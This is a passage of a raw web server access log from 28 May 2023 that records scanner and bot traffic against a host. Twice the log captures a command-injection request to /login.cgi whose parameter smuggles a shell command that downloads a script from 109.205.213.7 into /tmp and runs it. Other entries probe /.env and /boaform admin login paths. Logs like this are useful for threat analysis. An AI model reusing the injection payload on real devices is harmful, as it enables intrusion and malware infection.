Chrome/75.0.3770.100 Safari/537.36" 109.205.213.43 - - [28/May/2023:00:39:21 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 193.42.32.124 - - [28/May/2023:00:50:37 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.180.48.85 - - [28/May/2023:01:21:53 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 101.68.211.2 - - [28/May/2023:01:24:55 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 101.68.211.2 - - [28/May/2023:01:35:40 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 101.68.211.2 - - [28/May/2023:01:35:40 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 193.42.32.124 - - [28/May/2023:01:46:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 173.44.51.5 - - [28/May/2023:01:48:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 173.44.51.5 - - [28/May/2023:01:48:20 +0200] "GET /.env HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 173.44.51.5 - - [28/May/2023:01:48:20 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 151.245.0.73 - - [28/May/2023:01:52:44 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 109.205.213.107 - - [28/May/2023:01:58:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 167.250.5.21 - - [28/May/2023:01:59:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Go-http-client/1.1"